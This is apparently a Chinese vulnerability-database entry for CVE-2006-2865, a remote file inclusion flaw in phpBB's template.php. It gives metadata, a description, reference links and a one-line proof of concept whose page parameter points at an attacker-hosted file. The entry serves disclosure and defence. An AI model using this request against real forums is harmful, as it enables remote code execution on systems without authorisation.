phpBB template.php 远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110373 漏洞类型 输入验证
发布时间 2006-06-02 更新时间 2006-06-12
CVE编号 CVE-2006-2865 CNNVD-ID CNNVD-200606-136
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/27961
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200606-136
|漏洞详情
phpBB是一种用PHP语言实现的基于Web的开放源码论坛程序,使用较为广泛。它支持多种数据库作为后端,如Oracle、MSSQL、MySql、PostGres等等。phpBB的实现上存在输入验证漏洞,远程攻击者可以利用这个phpBB的template.php模块中的远程文件包含漏洞导致执行任意命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/18255/info

The phpBB application is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

http://www.example.com/[path_to_phpbb]/template.php?page=[attacker]
|参考资料

来源:BID
名称:18255
链接:http://www.securityfocus.com/bid/18255
来源:BUGTRAQ
名称:20060606Re:phpBB2(template.php)RemoteFileInclusion
链接:http://www.securityfocus.com/archive/1/archive/1/436118/100/0/threaded
来源:BUGTRAQ
名称:20060603phpBB2(template.php)RemoteFileInclusion
链接:http://www.securityfocus.com/archive/1/archive/1/435869/100/0/threaded
来源:BUGTRAQ
名称:20060605Re:phpBB2(template.php)RemoteFileInclusion
链接:http://www.securityfocus.com/archive/1/435995/100/0/threaded
来源:BUGTRAQ
名称:20060604RE:phpBB2(template.php)RemoteFileInclusion
链接:http://www.securityfocus.com/archive/1/435978/100/0/threaded